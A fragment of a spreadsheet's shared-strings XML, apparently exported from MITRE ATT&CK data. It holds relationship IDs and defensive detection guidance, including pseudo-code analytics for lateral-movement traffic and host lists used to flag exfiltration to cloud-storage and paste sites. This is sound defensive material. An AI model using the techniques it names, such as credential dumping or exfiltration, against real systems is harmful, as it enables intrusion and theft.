  <si>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relationship--f8bfa9b5-8754-467c-a71c-e2e577c8fbae</t>
  </si>
  <si>
    <t>relationship--406ad011-8d60-45b0-bb7e-52704684b4e8</t>
  </si>
  <si>
    <t>attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d</t>
  </si>
  <si>
    <t>relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5</t>
  </si>
  <si>
    <t>attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928</t>
  </si>
  <si>
    <t>relationship--16b9514b-bd70-4039-a1af-0175d5af58ad</t>
  </si>
  <si>
    <t>relationship--27aa0c45-a8e8-40cc-8591-39a84ca2db91</t>
  </si>
  <si>
    <t>relationship--dd141b03-0495-4097-afa2-8c4b04042052</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</si>
  <si>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</si>
  <si>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relationship--b8fce83b-82ea-4eec-9bb2-ef2e9ad1985c</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</si>
  <si>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</si>
  <si>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relationship--97b6c034-b96c-4532-8dd7-51fedcdcd31f</t>
  </si>
  <si>
    <t>relationship--a868dec8-2bfc-449e-b720-d4e6c7e37d13</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</si>
  <si>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</si>
  <si>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relationship--d2b3e3e2-9b1b-4d6e-a833-73fd9cc6394c</t>
  </si>
  <si>
    <t>attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c</t>
  </si>
  <si>
    <t>relationship--d17caf39-87c7-48a2-a146-8cdf28f034ef</t>
  </si>
  <si>
    <t>attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235</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</si>
  <si>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</si>
  <si>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relationship--57e7fcc7-88b1-4a60-b775-020d02efb9dc</t>
  </si>
  <si>
    <t>attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41</t>
  </si>
  <si>
    <t>relationship--fb08d927-7963-4246-a672-4757ea7b6e29</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</si>
  <si>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</si>
  <si>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relationship--8462069b-4e0c-4528-8004-65219a548274</t>
  </si>
  <si>
    <t>relationship--a89cdaac-9bc9-4673-8dbd-bdf3417d5d71</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</si>
  <si>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</si>
  <si>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relationship--4bd1d517-6f84-4f2d-9db6-781ec214b814</t>
  </si>
  <si>
    <t>Monitor network traffic content for evidence of data exfiltration, such as gratuitous or anomalous internal traffic containing collected data. Consider correlation with process monitoring and command lines associated with collection and exfiltration.</t>
  </si>
  <si>
    <t>relationship--b6cda6b5-b2c2-4472-a3c5-55bd0f5d8f88</t>
  </si>
  <si>
    <t>attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6</t>
  </si>
  <si>
    <t>relationship--2ef81f55-666f-4736-8334-f8fa56349c75</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</si>
  <si>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</si>
  <si>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relationship--c5235912-5f32-4bf6-933c-a5acb63f1dab</t>
  </si>
  <si>
    <t>relationship--aadfeef0-8532-4701-adf8-b2b4fb7ede08</t>
  </si>
  <si>
    <t>attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4</t>
  </si>
  <si>
    <t>relationship--8448deaa-03b2-4a48-8a1e-424b9befbda7</t>
  </si>
  <si>
    <t>attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161</t>
  </si>
  <si>
    <t>relationship--653916b2-1a5b-42fd-8c11-cd7ad9132bf4</t>
  </si>
  <si>
    <t>relationship--83e901bc-8c51-409b-8921-c0ce211f8a59</t>
  </si>
  <si>
    <t>relationship--6b433ac2-3801-47d7-973b-145408197f4f</t>
  </si>
  <si>
    <t>attack-pattern--bed04f7d-e48a-4e76-bd0f-4c57fe31fc46</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).</t>
  </si>
  <si>
    <t>relationship--af52d85d-8050-419d-a1f7-fc617cda1cc1</t>
  </si>
  <si>
    <t>Network Traffic Flow</t>
  </si>
  <si>
    <t>x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a</t>
  </si>
  <si>
    <t>Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.</t>
  </si>
  <si>
    <t>relationship--fb9ac63c-7ce8-4a81-be13-d1d7ba6ee4de</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</t>
  </si>
  <si>
    <t>relationship--0d1ae008-8b7f-4b64-8b05-2df3ef55f323</t>
  </si>
  <si>
    <t>relationship--876deeac-5c87-4d3d-b6a5-68512b9fb6d1</t>
  </si>
  <si>
    <t>relationship--00069454-a469-4905-97fd-b4057e86d29b</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</si>
  <si>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</si>
  <si>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relationship--0c609250-b74c-4b30-9eba-79691bde44df</t>
  </si>
  <si>
    <t>relationship--ae51e82a-ef28-4598-8dc2-fe719e15a577</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Remotely Scheduled Tasks via AT &lt;/h4&gt;
&lt;code&gt;flows = search Flow:Message
at_proto = filter flows where (dest_port == 445 and proto_info.pipe == "ATSVC")
at_create = filter flows where (proto_info.function == "JobAdd")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--3bab7405-b111-4272-a12c-0b1db8dcb5f8</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</si>
  <si>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</si>
  <si>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relationship--20748bc7-183a-49f3-9c95-802aa5384aca</t>
  </si>
  <si>
    <t>relationship--8f285c6f-9d12-49d9-b436-d9236ffb4ea5</t>
  </si>
  <si>
    <t>relationship--cc7193f4-c16a-4c1b-8605-0517de8947f9</t>
  </si>
  <si>
    <t>relationship--940b4e6c-0dff-4b51-a2e9-d268c1c028cf</t>
  </si>
  <si>
    <t>relationship--ce8fe693-19ee-4b56-9130-795f9d1738fe</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</si>
  <si>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</si>
  <si>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relationship--893007dc-42e4-4667-a179-95d3890286e7</t>
  </si>
  <si>
    <t>Monitor for network traffic originating from unknown/unexpected hardware devices.</t>
  </si>
  <si>
    <t>relationship--a460c0d7-bbab-48c0-b9ae-a9f761ece70d</t>
  </si>
  <si>
    <t>relationship--ef2c5dd4-2049-48f5-8873-f8e94a0deb26</t>
  </si>
  <si>
    <t>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&lt;h4&gt;Analytic 1 - SMB Events Monitoring&lt;/h4&gt;
&lt;code&gt;smb_events = filter flow where (dest_port == "445" and protocol == "smb")
smb_events.file_name = smb_events.proto_info.file_name &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a0e54774-50e2-4626-a826-5e692ef00a63</t>
  </si>
  <si>
    <t>relationship--9a731403-67c3-4d68-aca1-e5c18e1637bf</t>
  </si>
  <si>
    <t>relationship--038ef88e-14c6-4db0-a01e-2c33402d9e48</t>
  </si>
  <si>
    <t>attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd</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</si>
  <si>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</si>
  <si>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relationship--ade72853-1a09-417f-ad84-db50280c326c</t>
  </si>
  <si>
    <t>relationship--5d157b88-112e-46dc-8047-02adde6e680a</t>
  </si>
  <si>
    <t>relationship--329424c6-bea7-4b20-9e32-2a7db75f6281</t>
  </si>
  <si>
    <t>relationship--46371a48-980b-4686-a54b-a828e3ae35c2</t>
  </si>
  <si>
    <t>relationship--4ae04a82-5c2b-438a-83e5-d8175d10b1ff</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows., such as the usage of abnormal/unexpected protocols.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. </t>
  </si>
  <si>
    <t>relationship--81be67f1-3225-49ec-bbcb-cc267800070e</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor for cloud storages for data exfiltration. 
&lt;h4&gt;Analytic 1 - Suspicious Data Exfil&lt;/h4&gt;
&lt;code&gt;suspicious_exfil = filter network_traffic where (httpHost = "dropbox.com" or httpHost = "box.com" or httpHost = "drive.google.com" or httpHost = "mega.io" or httpHost = "mediafire.com")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a06be524-5fe0-4500-9216-6924b5d27f59</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor for use of code repositories for data exfiltration. 
&lt;h4&gt;Analytic 1 - Suspicious Data Exfil&lt;/h4&gt;
&lt;code&gt;suspicious_exfil = filter network_traffic where (httpHost = "github.com" or httpHost ="justpaste.it" or httpHost= "pastebin.com" or httpHost="onpaste.com" or httpHost="transfernow.net" or httpHost = "codepad.org")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--d46bfe1c-6991-4783-9d0e-e5e2a9c39bc1</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows, specifically to text storage sites such as `Pastebin[.]com`, `Paste[.]ee`, and `Pastebin[.]pl`.</t>
  </si>
  <si>
    <t>relationship--5a192f7a-c99c-4f15-b9bd-865a3fbe3851</t>
  </si>
  <si>
    <t>relationship--d40698cf-d988-4da5-9d45-6056b47bc055</t>
  </si>
  <si>
    <t>relationship--b3515d7c-4e11-44b3-9342-4a6a7c378e75</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows, such as unexpected surges or other abnormal inbound/outbound patterns.</t>
  </si>
  <si>
    <t>relationship--478ac48b-ff1e-410a-93e9-ed511ccdf9fa</t>
  </si>
  <si>
    <t>relationship--89c82970-9959-456b-9533-5803fd8008a8</t>
  </si>
  <si>
    <t>relationship--9aaedcf6-f8fe-467f-bed3-6c7f4c4d7b8a</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems.If attempts are detected, then investigate endpoint data sources to find the root cause.
&lt;h4&gt;Analytic 1 - SMB Session Setups&lt;/h4&gt;
&lt;code&gt;smb_setup = filter flow where (dest_port == 445 and protocol == smb.setup)
smb_setup.user = smb_write.proto_info.user_name
smb_setup.target_host = smb_write.proto_info.hostname&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--3c6a8fa7-4ff5-4ba7-9e37-a490828d7da8</t>
  </si>
  <si>
    <t>relationship--52f5f77e-9018-4a2a-b3e8-80daa3569493</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</t>
  </si>
  <si>
    <t>relationship--6c8c3730-d8a7-4a27-a200-b745038dc8a5</t>
  </si>
  <si>
    <t>relationship--861f1959-eeda-41e3-b8c4-f85c24f1794a</t>
  </si>
  <si>
    <t>relationship--56713b27-7353-4fbd-9307-b9a9075e1309</t>
  </si>
  <si>
    <t>relationship--94023ff0-7cc6-4fb3-9d2b-b26b793324cb</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware. </t>
  </si>
  <si>
    <t>relationship--5efbfab6-7fdb-4453-ba90-e94b34387bd1</t>
  </si>
  <si>
    <t>relationship--cdf0c1a3-179f-4e9c-bdea-358a9d6ac52d</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Remote Registry&lt;/h4&gt;
&lt;code&gt;flows = search Flow:Message
winreg = filter flows where (dest_port == 445 and proto_info.pipe == "WINREG")
winreg_modify = filter flows where (proto_info.function == "Create*" or proto_info.function == "SetValue*")&lt;/code&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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&lt;h4&gt;Analytic 1 - Identifying Port Scanning Activity&lt;/h4&gt;
&lt;code&gt;flow = filter flow where (src_type = “firewall_logs” AND dest_ip = “internal_subnet” ) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--aaa7ebfc-f686-4aea-b54b-5e6366b276f7</t>
  </si>
  <si>
    <t>relationship--fb440b77-a0a7-481b-8719-3485414f5cc1</t>
  </si>
  <si>
    <t>Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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relationship--7de06d58-79d0-43d5-b40e-d3e6d14c3211</t>
  </si>
  <si>
    <t>relationship--c2e25ecf-13c9-42c1-87cc-6072343156aa</t>
  </si>
  <si>
    <t>relationship--09a3f0af-1610-4cac-955d-7b657a4fe141</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</si>
  <si>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</si>
  <si>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relationship--9a6f72d8-f813-48d0-954c-43bd629b2c90</t>
  </si>
  <si>
    <t>relationship--db694c8b-c38d-4418-937f-9b0ad938f3b5</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
&lt;h4&gt;Analytic 1 - Suspicious Port Usage&lt;/h4&gt;
&lt;code&gt;suspicious_ports = filter network_traffic where ((protocol ="6" and (serverPort = 5938 or serverPort = 6568 or serverPort = 5650 or serverPort = 5655 or serverPort =5631)) or (protocol = "17" and (serverPort = 15000 and serverPort = 5632 )) or(httpHost = "remoteutilities.com"))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--b196f874-ca3e-4261-8317-3a0838adf2d8</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</si>
  <si>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Windows security logs (Event ID 4624, 4634, 4647, 4778)
- Detecting network connections from &lt;code&gt;mstsc.exe&lt;/code&gt;
- Execution of the process &lt;code&gt;rdpclip.exe&lt;/code&gt;
- Runs as the clipboard manager on the RDP target if clipboard sharing is enabled
&lt;h4&gt; Analytic 1 &lt;/h4&gt;
&lt;code&gt;rdp_start = filter flow_start where (port == "3389")
rdp_end = filter flow_start where (port == "3389")
rdp = group flow_start, flow_end by src_ip, src_port, dest_ip, dest_port &lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--4fd6fe3b-e81b-46fc-974e-188a8c69d8fd</t>
  </si>
  <si>
    <t>relationship--02c44129-5ee7-4f4c-84b1-aae2b0129f4a</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows that may be related to abuse of [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC.</t>
  </si>
  <si>
    <t>relationship--f78b6600-c123-4b9e-8728-c2a2fcd5c1d8</t>
  </si>
  <si>
    <t>relationship--80d305f4-1c13-48fb-ac47-14d272acefd9</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</si>
  <si>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&lt;h4&gt;Analytic 1 - SMB Write&lt;/h4&gt;
&lt;code&gt;smb_write = filter flow where (dest_port == "445" AND protocol == "smb.write")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - SMB Copy and Execution&lt;/h4&gt;
&lt;code&gt;remote_start = join (smb:write, process:create) where (
 smb_write.hostname == process.hostname AND
 smb_write.file_path == process.image_path AND
 (smb_write.time &lt; process.time)) &lt;/code&gt;
&lt;h4&gt;Analytic 3 - RPC Activity&lt;/h4&gt;
&lt;code&gt; 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</si>
  <si>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relationship--659dc38a-76ca-419d-9317-d55ba9de5f73</t>
  </si>
  <si>
    <t>relationship--bf4ddbd8-66de-4e14-8f58-6dee7b7b7b14</t>
  </si>
  <si>
    <t>attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120</t>
  </si>
  <si>
    <t>relationship--fc4ca529-9881-47bd-a738-d4aef1482518</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</si>
  <si>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this analytic.
&lt;h4&gt;Analytic 1 - Remotely Scheduled Tasks via Schtasks&lt;/h4&gt;
&lt;code&gt; schtasks_rpc = filter flows where (src_port &gt;= 49152 AND dest_port &gt;= 49152 AND proto_info.rpc_interface == "ITaskSchedulerService")
sch_create = filter flows where (proto_info.function == “SchRpcRegisterTask” OR proto_info.function == “SchRpcRun” OR proto_info.function == “SchRpcEnableTask”) &lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--66e36342-6daf-40ac-99b3-efad6734d1b4</t>
  </si>
  <si>
    <t>relationship--4a50ca7d-1b68-4b11-85c5-55d6c38a2fc3</t>
  </si>
  <si>
    <t>relationship--017fac51-a6ab-491b-8b48-08be808ae060</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
&lt;h4&gt; Analytic 1 - Service Control Manager spawning Command Shell&lt;/h4&gt;
&lt;code&gt;service_proto = filter flows where (dest_port == 445 and proto_info.pipe == “SVCCTL”)
service_create = filter flows where (proto_info.function == “CreateServiceW” OR proto_info.function == “CreateServiceA” OR proto_info.function == “StartServiceW” OR proto_info.function == “StartServiceA” )&lt;/code&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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relationship--6df6b4b6-95f4-469f-8fdf-7622c2607f07</t>
  </si>
  <si>
    <t>relationship--6d025ceb-85ee-40f4-a15c-121758ea6894</t>
  </si>
  <si>
    <t>relationship--85bc0dfe-a680-4bf5-92e1-9c98978b513b</t>
  </si>
  <si>
    <t>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&lt;h4&gt;Analytic 1 - RPC Activity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 &lt;/code&gt;
&lt;h4&gt;Analytic 2 - WinRM &lt;/h4&gt;
&lt;code&gt;winrm = filter flow where (dest_port == 5985)
winrm_s = filter flow where (dest_port == 5986)&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--c2cd39bc-7955-42d3-9e67-b1315b098c07</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</si>
  <si>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
&lt;h4&gt;Analytic 1 - Remotely Launched Executables via Services&lt;/h4&gt;
&lt;code&gt;service = filter process where (parent_exe == "services.exe")
remote_start = join (flow, service ) where (
 flow.hostname == service.hostname and
 flow.pid == service.pid and
 (flow.time &lt; service.time &lt; flow.time + 1 second))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--55ac2bf6-d8a3-408e-a267-e985d02d72ba</t>
  </si>
  <si>
    <t>OS API Execution</t>
  </si>
  <si>
    <t>x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e</t>
  </si>
  <si>
    <t>Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055). Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>relationship--5d65efe0-f50e-437a-ad87-801ba0df369e</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</si>
  <si>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</si>
  <si>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relationship--3cdf6168-df7a-47e9-8262-5e4e7d5ab16a</t>
  </si>
  <si>
    <t>Monitor and analyze application programming interface (API) calls that are indicative of Registry edits, such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>relationship--695b5096-83b2-45de-8d8d-05ce75d47f0d</t>
  </si>
  <si>
    <t>Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>relationship--ebc54b2c-1ecf-4db4-84b2-b7cd0defbfa7</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.</t>
  </si>
  <si>
    <t>relationship--eab5d0d3-9a1b-4943-bf51-e5bff9a2b04d</t>
  </si>
  <si>
    <t>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&lt;h4&gt; Analytic 1 - Suspicious API Calls&lt;/h4&gt;
&lt;code&gt; suspicious_apis = filter processes where ApiName LIKE '%GetProcesses%' OR ApiName LIKE '%GetForegroundWindow%'&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--e3f80c24-352f-43e7-bf1e-eeba9bc348cc</t>
  </si>
  <si>
    <t>attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605</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</si>
  <si>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</si>
  <si>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relationship--5df4363d-deb1-4ae9-bec6-2b9a9198c53b</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</si>
  <si>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</si>
  <si>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relationship--11395d9f-861f-4219-9558-aa814b7d4160</t>
  </si>
  <si>
    <t>15 July 2022</t>
  </si>
  <si>
    <t>Monitor for API calls that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>relationship--0cde11e7-e81f-4e32-a076-92ac53e88112</t>
  </si>
  <si>
    <t>attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c</t>
  </si>
  <si>
    <t>Monitor for API calls such as `fork()` which can be abused to masquerade or manipulate process metadata.</t>
  </si>
  <si>
    <t>relationship--c7844419-94a1-4757-b3c1-5397195d5478</t>
  </si>
  <si>
    <t>Monitor for Windows API calls that may clear Windows Event Logs to hide the activity of an intrusion.</t>
  </si>
  <si>
    <t>relationship--85ddf8c4-92fe-4f48-b47c-78bf06ba44d6</t>
  </si>
  <si>
    <t>Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.</t>
  </si>
  <si>
    <t>relationship--471ac6a2-4e6b-4267-8087-c22c707bbc21</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</si>
  <si>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</si>
  <si>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relationship--213916b1-76e8-4ebf-af96-fdd0f4a18e2b</t>
  </si>
  <si>
    <t>Monitor for API calls that may forge web cookies that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
    <t>relationship--bcfe8d7a-62ba-457e-963a-d18c67fd6641</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</si>
  <si>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</si>
  <si>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relationship--5e2d566c-0419-4d6a-bba1-5e860cf3a716</t>
  </si>
  <si>
    <t>06 April 2022</t>
  </si>
  <si>
    <t>Monitor for API calls that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--c55f88fd-0ec8-4c91-abce-d9e52d7616dc</t>
  </si>
  <si>
    <t>attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6</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</si>
  <si>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</si>
  <si>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relationship--afd1bc39-3449-459f-8aaf-0689f57524a0</t>
  </si>
  <si>
    <t>Monitor for API calls that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>relationship--f7111d5e-7828-46a7-86fc-1275a34632a9</t>
  </si>
  <si>
    <t>Monitor for API calls that may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--f6910156-0157-4508-b8bd-bbbed04b0df6</t>
  </si>
  <si>
    <t>Monitor for API calls associated with altering data. Remote access tools with built-in features may interact directly with the Windows API to gather information.</t>
  </si>
  <si>
    <t>relationship--58cb7d29-8633-4f52-a1bc-029b544e5610</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. </t>
  </si>
  <si>
    <t>relationship--5be97f0e-bf09-4304-b7b1-2bc6321eb736</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</si>
  <si>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</si>
  <si>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relationship--1f7a90ae-703d-4efa-9b80-48738784dd6a</t>
  </si>
  <si>
    <t>Monitor for API calls (such as `EnumDeviceDrivers()`) that may attempt to gather information about local device drivers.</t>
  </si>
  <si>
    <t>relationship--5bd670ae-aee6-4e48-a250-1d13f660054a</t>
  </si>
  <si>
    <t>Monitor for abnormal execution of syslog and other functions associated with system logging.</t>
  </si>
  <si>
    <t>relationship--6071e96a-d6eb-44a2-abf5-9162d6ec5aad</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to gather information about domain accounts such as type of user, privileges and groups.</t>
  </si>
  <si>
    <t>relationship--17222228-511a-4a99-8a7f-5918620e4b64</t>
  </si>
  <si>
    <t>Monitor for API calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller</t>
  </si>
  <si>
    <t>relationship--ca260140-0bdb-4862-ba93-6fb977753fc6</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</si>
  <si>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</si>
  <si>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relationship--a6cc46bc-a2ed-49fb-821a-e22da00e4e29</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</si>
  <si>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</si>
  <si>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relationship--991ab4f3-57e0-44ea-b5c0-247018e3b184</t>
  </si>
  <si>
    <t>05 April 2022</t>
  </si>
  <si>
    <t>Monitor and analyze calls to functions such as  `GetProcAddress()` and `LoadLibrary()` that are associated with dynamically loading API functions.(Citation: Huntress API Hash)</t>
  </si>
  <si>
    <t>relationship--f570bb28-5658-4831-ba9c-3e437b496f01</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</si>
  <si>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&lt;h4&gt;Analytic 1 - DLL Injection via Load Library &lt;/h4&gt;
&lt;code&gt;remote_thread = filter (start_function == "LoadLibraryA" or start_function == "LoadLibraryW")
remote_thread = filter (src_image_path != "C:\Path\To\TrustedProgram.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--ef647214-5ced-4457-9f80-3f6c5293da6a</t>
  </si>
  <si>
    <t>attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0</t>
  </si>
  <si>
    <t>Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>relationship--b60f1f5c-c4ee-4959-afa2-2aa844275384</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected usage of syscalls such as `mount` that may indicate an attempt to escape from a privileged container to host. </t>
  </si>
  <si>
    <t>relationship--88c5ab38-2081-4e18-b069-d69c252aff97</t>
  </si>
  <si>
    <t>attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298</t>
  </si>
  <si>
    <t>relationship--6cfb2db1-9c74-42d3-9c64-e211ad8d1b45</t>
  </si>
  <si>
    <t>Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</t>
  </si>
  <si>
    <t>relationship--f651bc78-e055-4237-88f5-1e1978c13647</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--dd1783dd-53ce-478e-93af-4bad4e9314b2</t>
  </si>
  <si>
    <t>Monitor for the abnormal execution of API functions associated with system logging.</t>
  </si>
  <si>
    <t>relationship--dea19f68-b015-445b-89d6-ad684ba0ff1c</t>
  </si>
  <si>
    <t>Monitor for API calls that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--4e268134-0cd0-488e-85a3-cf9380f0cedb</t>
  </si>
  <si>
    <t>Monitor for API calls to SetWindowsHook, GetKeyState, and GetAsyncKeyState (Citation: Adventures of a Keystroke)</t>
  </si>
  <si>
    <t>relationship--e012a6c2-93ea-4f85-9915-6adb85f806e4</t>
  </si>
  <si>
    <t>attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde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</si>
  <si>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</si>
  <si>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relationship--341e27de-798b-42e1-b636-4696d650bb8d</t>
  </si>
  <si>
    <t>Monitor for Keychain Services API calls, specifically legacy extensions such as &lt;code&gt;SecKeychainFindInternetPassword&lt;/code&gt;, that may collect Keychain data from a system to acquire credentials.(Citation: Keychain Items Apple Dev API)</t>
  </si>
  <si>
    <t>relationship--803b551a-32a0-4c75-8a59-6eedfb2ee571</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</si>
  <si>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</si>
  <si>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relationship--516db385-9b1b-40ec-aa57-7f993caf07cf</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</si>
  <si>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</si>
  <si>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relationship--8fa54acd-fbe7-43dd-aaf3-4d3d9ab5babb</t>
  </si>
  <si>
    <t>attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99</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</si>
  <si>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</si>
  <si>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relationship--cb53d2f8-13ae-4ca8-9f76-d5e6d7c67645</t>
  </si>
  <si>
    <t>Monitor for API calls (such as &lt;code&gt;NetUserEnum()&lt;/code&gt;) that may attempt to gather local accounts information such as type of user, privileges and groups.</t>
  </si>
  <si>
    <t>relationship--4f0c2dfd-f16d-4bb0-bcbc-6f5bb8662597</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</si>
  <si>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</si>
  <si>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relationship--6ad43f71-f2dd-445f-8352-e762005870cc</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</si>
  <si>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</si>
  <si>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relationship--350753af-f3b2-42e3-b27f-7afe5fe0caf4</t>
  </si>
  <si>
    <t>relationship--e5010306-d04f-423e-9a5b-d236a848de29</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</si>
  <si>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</si>
  <si>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relationship--48c785c4-8e40-4044-b10b-c760d25a24ca</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</si>
  <si>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</si>
  <si>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relationship--0aae6418-f1c3-4b93-b40c-a43985ec1376</t>
  </si>
  <si>
    <t>Monitor for API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>relationship--89e62a1b-169f-4174-9594-1eec0cd4cb0c</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</si>
  <si>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</si>
  <si>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relationship--fc96ae93-e2ff-4991-a605-9f8690d89949</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</si>
  <si>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</si>
  <si>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relationship--8068bd61-84af-494c-93c5-3b16318896e4</t>
  </si>
  <si>
    <t>Monitor for abnormal API calls to `NPLogonNotify()`.(Citation: NPLogonNotify)</t>
  </si>
  <si>
    <t>relationship--8699832d-126e-439f-b342-5e1b3dac9115</t>
  </si>
  <si>
    <t>Monitor for API calls that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.</t>
  </si>
  <si>
    <t>relationship--33637b62-ee17-40d8-aa2d-7d5e3e7a8e49</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.</t>
  </si>
  <si>
    <t>relationship--cce5cf85-7187-40da-8fda-bd237ad1d05f</t>
  </si>
  <si>
    <t>Monitor and analyze calls to functions such as  `GetProcAddress()` that are associated with malicious code obfuscation.(Citation: Huntress API Hash)</t>
  </si>
  <si>
    <t>relationship--c4d843c9-5297-4483-886e-7979e6c807b8</t>
  </si>
  <si>
    <t>attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a</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</si>
  <si>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</si>
  <si>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relationship--44356d36-d119-4274-8c93-9e0bd50f60ed</t>
  </si>
  <si>
    <t>relationship--403c4483-ad98-4779-b1f1-eb769ce8987c</t>
  </si>
  <si>
